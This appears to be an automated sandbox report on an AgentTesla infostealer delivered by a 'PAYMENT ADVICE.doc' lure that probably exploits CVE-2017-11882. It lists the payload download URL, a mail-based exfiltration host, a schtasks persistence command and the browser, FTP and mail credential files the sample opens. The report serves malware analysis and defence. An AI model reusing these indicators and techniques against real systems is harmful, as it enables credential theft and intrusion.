                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe TID: 2488 | Thread sleep time: -150000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Thread delayed: delay time: 47836
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Thread delayed: delay time: 40000
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Thread delayed: delay time: 30000
                Source: merciesxdncdc.exe | Binary or memory string: DdUXhZQ[fUE6Ws]YTSk6WLInYD73f[o5QsEYYq{nV]8XY[8XVpEzfoQZd5M[]WMZ][<IgogJD}4pfy]3[3Y5]DL[]}Y4[3Y5]D75esU[\moJezE[TiU[]qET]m8Z\3QqeMU[]K<IgogJD|YJg4E[eyQ3[3Y5]DL6e3Q5\xDjfoUZd5<pfTU6\osp\SQ[]mopg|Y5XlY5Y843[wEjfoUZd5<pfTU6\osp\SQ[e|<pU843[wEjfoQ[YDL[]nopgyMKX3QZ
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Process information queried: ProcessInformation
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Process token adjusted: Debug
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion:

                Injects a PE file into a foreign processes
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Memory written: C:\Users\user\AppData\Roaming\merciesxdncdc.exe base: 400000 value starts with: 4D5A
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\merciesxdncdc.exe C:\Users\user\AppData\Roaming\merciesxdncdc.exe
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JxCmQoa' /XML 'C:\Users\user\AppData\Local\Temp\tmp2E52.tmp'
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Process created: C:\Users\user\AppData\Roaming\merciesxdncdc.exe C:\Users\user\AppData\Roaming\merciesxdncdc.exe
                Source: merciesxdncdc.exe, 00000007.00000002.2346712504.0000000000C50000.00000002.00000001.sdmp | Binary or memory string: Program Manager
                Source: merciesxdncdc.exe, 00000007.00000002.2346712504.0000000000C50000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
                Source: merciesxdncdc.exe, 00000007.00000002.2346712504.0000000000C50000.00000002.00000001.sdmp | Binary or memory string: !Progman
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Queries volume information: C:\Users\user\AppData\Roaming\merciesxdncdc.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Blob

                Stealing of Sensitive Information:

                Yara detected AgentTesla
                Source: Yara match | File source: 7.2.merciesxdncdc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000007.00000002.2346238680.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Yara detected AgentTesla
                Source: Yara match | File source: 7.2.merciesxdncdc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000007.00000002.2347741002.00000000028A5000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.2346238680.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.2347049705.0000000002461000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.2347184343.000000000250A000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: merciesxdncdc.exe PID: 2728, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                Tries to steal Mail credentials (via file access)
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: Yara match | File source: 00000007.00000002.2347741002.00000000028A5000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.2347049705.0000000002461000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.2347184343.000000000250A000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: merciesxdncdc.exe PID: 2728, type: MEMORY

                Remote Access Functionality:

                Yara detected AgentTesla
                Source: Yara match | File source: 7.2.merciesxdncdc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000007.00000002.2346238680.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Yara detected AgentTesla
                Source: Yara match | File source: 7.2.merciesxdncdc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000007.00000002.2347741002.00000000028A5000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.2346238680.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.2347049705.0000000002461000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.2347184343.000000000250A000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: merciesxdncdc.exe PID: 2728, type: MEMORY

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation 211 | Scheduled Task/Job 1 | Process Injection 112 | Disable or Modify Tools 11 | OS Credential Dumping 2 | File and Directory Discovery 1 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Exploitation for Client Execution 13 | Boot or Logon Initialization Scripts | Scheduled Task/Job 1 | Deobfuscate/Decode Files or Information 1 | Input Capture 21 | System Information Discovery 114 | Remote Desktop Protocol | Data from Local System 2 | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Command and Scripting Interpreter 1 | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information 1 | Security Account Manager | Query Registry 1 | SMB/Windows Admin Shares | Email Collection 1 | Automated Exfiltration | Non-Standard Port 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | Scheduled Task/Job 1 | Logon Script (Mac) | Logon Script (Mac) | Software Packing 2 | NTDS | Security Software Discovery 211 | Distributed Component Object Model | Input Capture 21 | Scheduled Transfer | Non-Application Layer Protocol 2 | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Masquerading 1 | LSA Secrets | Process Discovery 2 | SSH | Clipboard Data 1 | Data Transfer Size Limits | Application Layer Protocol 32 | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion 131 | Cached Domain Credentials | Virtualization/Sandbox Evasion 131 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection 112 | DCSync | Application Window Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | Remote System Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |

                Behavior Graph

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
Behavior Graph ID: 452655
Sample: PAYMENT ADVICE.doc
Startdate: 22/07/2021
Architecture: WINDOWS
Score: 100

Start (PAYMENT ADVICE.doc):
• Found malware configuration
• Antivirus detection for URL or domain
• Multi AV Scanner detection for dropped file
• 9 other signatures
• started: EQNEDT32.EXE 11
• started: WINWORD.EXE 291 23

EQNEDT32.EXE:
• DNS/IP: maritradeshipplng.com 104.21.27.166, ports 49167, 80, CLOUDFLARENETUS, United States
• dropped: C:\Users\user\AppData\...\merciesxdncdc.exe, PE32
• dropped: C:\Users\user\AppData\Local\...\okilo[1].exe, PE32
• Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
• started: merciesxdncdc.exe 1 8

merciesxdncdc.exe (started by EQNEDT32.EXE):
• dropped: C:\Users\user\AppData\Roaming\JxCmQoa.exe, PE32
• dropped: C:\Users\user\AppData\Local\...\tmp2E52.tmp, XML
• Multi AV Scanner detection for dropped file
• Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
• Machine Learning detection for dropped file
• 4 other signatures
• started: merciesxdncdc.exe 12
• started: schtasks.exe

merciesxdncdc.exe (child, started by merciesxdncdc.exe):
• DNS/IP: mail.privateemail.com 198.54.122.60, ports 49168, 49170, 49171, NAMECHEAP-NETUS, United States
• Tries to steal Mail credentials (via file access)
• Tries to harvest and steal ftp login credentials
• Tries to harvest and steal browser information (history, passwords, etc)
• Installs a global keyboard hook

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

Source | Detection | Scanner | Label
PAYMENT ADVICE.doc | 26% | ReversingLabs | Document-Office.Exploit.CVE-2017-11882

                Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\merciesxdncdc.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okilo[1].exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\JxCmQoa.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okilo[1].exe | 24% | ReversingLabs | ByteCode-MSIL.Infostealer.Coins
C:\Users\user\AppData\Roaming\JxCmQoa.exe | 24% | ReversingLabs | ByteCode-MSIL.Infostealer.Coins
C:\Users\user\AppData\Roaming\merciesxdncdc.exe | 24% | ReversingLabs | ByteCode-MSIL.Infostealer.Coins

                Unpacked PE Files

Source | Detection | Scanner | Label
7.2.merciesxdncdc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1138205

                Domains

                No Antivirus matches

                URLs

Source | Detection | Scanner | Label
http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0 | 0% | URL Reputation | safe
http://www.a-cert.at0E | 0% | URL Reputation | safe
http://www.e-me.lv/repository0 | 0% | URL Reputation | safe
http://crl.chambersign.org/chambersroot.crl0 | 0% | URL Reputation | safe
http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0 | 0% | URL Reputation | safe
http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0 | 0% | URL Reputation | safe
http://www.certifikat.dk/repository0 | 0% | URL Reputation | safe
http://www.chambersign.org1 | 0% | URL Reputation | safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
http://www.pkioverheid.nl/policies/root-policy0 | 0% | URL Reputation | safe
http://IXudBJ.com | 0% | Avira URL Cloud | safe
https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0 | 0% | URL Reputation | safe
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl | 0% | URL Reputation | safe
http://www.certplus.com/CRL/class3P.crl0 | 0% | URL Reputation | safe
http://www.post.trust.ie/reposit/cps.html0 | 0% | URL Reputation | safe
http://www.certplus.com/CRL/class2.crl0 | 0% | URL Reputation | safe
http://www.sk.ee/cps/0 | 0% | URL Reputation | safe
http://www.certicamara.com0 | 0% | URL Reputation | safe
http://www.globaltrust.info0= | 0% | Avira URL Cloud | safe
https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe
http://www.ssc.lt/cps03 | 0% | URL Reputation | safe
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0= | 0% | URL Reputation | safe
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0# | 0% | URL Reputation | safe
http://ocsp.pki.gva.es0 | 0% | URL Reputation | safe
http://crl.oces.certifikat.dk/oces.crl0 | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
http://crl.ssc.lt/root-b/cacrl.crl0 | 0% | URL Reputation | safe
http://www.dnie.es/dpc0 | 0% | URL Reputation | safe
http://www.rootca.or.kr/rca/cps.html0 | 0% | URL Reputation | safe
http://www.trustcenter.de/guidelines0 | 0% | URL Reputation | safe
http://www.globaltrust.info0 | 0% | URL Reputation | safe
https://www.catcert.net/verarrel | 0% | URL Reputation | safe

                Domains and IPs

                Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
maritradeshipplng.com | 104.21.27.166 | true | true | | unknown
mail.privateemail.com | 198.54.122.60 | true | false | | high

                    Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://maritradeshipplng.com/wayss/okilo.exe | true | Avira URL Cloud: malware | unknown

                    URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://127.0.0.1:HTTP/1.1 | merciesxdncdc.exe, 00000007.00000002.2347049705.0000000002461000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0 | merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.a-cert.at0E | merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.e-me.lv/repository0 | merciesxdncdc.exe, 00000007.00000003.2227055337.000000000628C000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.chambersign.org/chambersroot.crl0 | merciesxdncdc.exe, 00000007.00000003.2226277785.000000000626E000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0 | merciesxdncdc.exe, 00000007.00000003.2226349491.00000000062A9000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0 | merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.certifikat.dk/repository0 | merciesxdncdc.exe, 00000007.00000003.2226569251.000000000627F000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.chambersign.org1 | merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | merciesxdncdc.exe, 00000007.00000002.2351540705.00000000061F0000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.diginotar.nl/cps/pkioverheid0 | merciesxdncdc.exe, 00000007.00000002.2351571827.000000000621B000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.pkioverheid.nl/policies/root-policy0 | merciesxdncdc.exe, 00000007.00000003.2226277785.000000000626E000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://repository.swisssign.com/0 | merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmp | false | | high
http://IXudBJ.com | merciesxdncdc.exe, 00000007.00000002.2347049705.0000000002461000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0 | merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl | merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.certplus.com/CRL/class3P.crl0 | merciesxdncdc.exe, 00000007.00000003.2226188928.00000000062DF000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.post.trust.ie/reposit/cps.html0 | merciesxdncdc.exe, 00000007.00000003.2226277785.000000000626E000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.certplus.com/CRL/class2.crl0 | merciesxdncdc.exe, 00000007.00000003.2226188928.00000000062DF000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sk.ee/cps/0 | merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.certicamara.com0 | merciesxdncdc.exe, 00000007.00000003.2226277785.000000000626E000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.globaltrust.info0= | merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E | merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | merciesxdncdc.exe, 00000007.00000002.2346238680.0000000000402000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown
http://servername/isapibackend.dll | merciesxdncdc.exe, 00000007.00000002.2354088595.0000000007970000.00000002.00000001.sdmp | false | Avira URL Cloud: safe | low
http://www.ssc.lt/cps03 | merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0= | merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0# | merciesxdncdc.exe, 00000007.00000002.2351633148.0000000006293000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://ocsp.pki.gva.es0 | merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.oces.certifikat.dk/oces.crl0 | merciesxdncdc.exe, 00000007.00000003.2226569251.000000000627F000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | merciesxdncdc.exe, 00000007.00000002.2347049705.0000000002461000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.ssc.lt/root-b/cacrl.crl0 | merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.dnie.es/dpc0 | merciesxdncdc.exe, 00000007.00000003.2226569251.000000000627F000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.rootca.or.kr/rca/cps.html0 | merciesxdncdc.exe, 00000007.00000003.2226569251.000000000627F000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.trustcenter.de/guidelines0 | merciesxdncdc.exe, 00000007.00000003.2226188928.00000000062DF000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.globaltrust.info0 | merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://mail.privateemail.com | merciesxdncdc.exe, 00000007.00000002.2347296041.00000000025A6000.00000004.00000001.sdmp | false | | high
http://www.entrust.net/CRL/Client1.crl0 | merciesxdncdc.exe, 00000007.00000003.2226277785.000000000626E000.00000004.00000001.sdmp | false | | high
http://www.entrust.net/CRL/net1.crl0 | merciesxdncdc.exe, 00000007.00000003.2226188928.00000000062DF000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | merciesxdncdc.exe, 00000007.00000002.2351007158.0000000005D80000.00000002.00000001.sdmp | false | | high
https://www.catcert.net/verarrel | merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.e-szigno.hu/RootCA.crl | merciesxdncdc.exe, 00000007.00000003.2226569251.000000000627F000.00000004.00000001.sdmp | false | | high
http://www.signatur.rtr.at/current.crl0 | merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmp | false | | high
http://www.sk.ee/juur/crl/0 | merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.chambersign.org/chambersignroot.crl0 | merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.xrampsecurity.com/XGCA.crl0 | merciesxdncdc.exe, 00000007.00000003.2226277785.000000000626E000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.quovadis.bm0 | merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.trustdst.com/certificates/policy/ACES-index.html0 | merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.firmaprofesional.com0 | merciesxdncdc.exe, 00000007.00000003.2226277785.000000000626E000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://www.netlock.net/docs | merciesxdncdc.exe, 00000007.00000003.2226277785.000000000626E000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl | merciesxdncdc.exe, 00000007.00000003.2226569251.000000000627F000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.entrust.net/2048ca.crl0 | merciesxdncdc.exe, 00000007.00000002.2351571827.000000000621B000.00000004.00000001.sdmp | false | | high
http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0 | merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmp | false | | high
http://www.e-trust.be/CPS/QNcerts | merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.certicamara.com/certicamaraca.crl0 | merciesxdncdc.exe, 00000007.00000003.2226569251.000000000627F000.00000004.00000001.sdmp | false | | high
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0 | merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://fedir.comsign.co.il/crl/ComSignCA.crl0 | merciesxdncdc.exe, 00000007.00000003.2226277785.000000000626E000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0 | merciesxdncdc.exe, 00000007.00000003.2226569251.000000000627F000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://ocsp.sectigo.com0 | merciesxdncdc.exe, 00000007.00000002.2351633148.0000000006293000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://ocsp.entrust.net03 | merciesxdncdc.exe, 00000007.00000002.2351571827.000000000621B000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://cps.chambersign.org/cps/chambersroot.html0 | merciesxdncdc.exe, 00000007.00000003.2226277785.000000000626E000.00000004.00000001.sdmp | false | URL Reputation: safe |
                                        unknown
                                        http://api.twitter.com/1/direct_messages.xml?since_id=merciesxdncdc.exe, merciesxdncdc.exe, 00000007.00000000.2140079675.00000000009D2000.00000020.00020000.sdmp, merciesxdncdc.exe.2.drfalse
                                          high
                                          http://www.acabogacia.org0merciesxdncdc.exe, 00000007.00000003.2227055337.000000000628C000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          https://N9CITA5Q9HG.orgmerciesxdncdc.exe, 00000007.00000002.2347741002.00000000028A5000.00000004.00000001.sdmp, merciesxdncdc.exe, 00000007.00000002.2347870070.000000000292B000.00000004.00000001.sdmp, merciesxdncdc.exe, 00000007.00000002.2347810118.0000000002902000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://ca.sia.it/seccli/repository/CPS0merciesxdncdc.exe, 00000007.00000003.2226188928.00000000062DF000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0merciesxdncdc.exe, 00000007.00000003.2226277785.000000000626E000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://twitter.com/statuses/user_timeline.xml?screen_name=merciesxdncdc.exe, merciesxdncdc.exe, 00000007.00000000.2140079675.00000000009D2000.00000020.00020000.sdmp, merciesxdncdc.exe.2.drfalse
                                            high
                                            http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0merciesxdncdc.exe, 00000007.00000003.2226569251.000000000627F000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.certicamara.com/certicamaraca.crl0;merciesxdncdc.exe, 00000007.00000003.2226569251.000000000627F000.00000004.00000001.sdmpfalse
                                              high
                                              http://www.e-szigno.hu/RootCA.crt0merciesxdncdc.exe, 00000007.00000003.2226569251.000000000627F000.00000004.00000001.sdmpfalse
                                                high
                                                http://www.quovadisglobal.com/cps0merciesxdncdc.exe, 00000007.00000003.2226569251.000000000627F000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://www.valicert.com/1merciesxdncdc.exe, 00000007.00000003.2226188928.00000000062DF000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.e-szigno.hu/SZSZ/0merciesxdncdc.exe, 00000007.00000003.2226569251.000000000627F000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://www.%s.comPAmerciesxdncdc.exe, 00000007.00000002.2351007158.0000000005D80000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    low
                                                    http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://ocsp.quovadisoffshore.com0merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
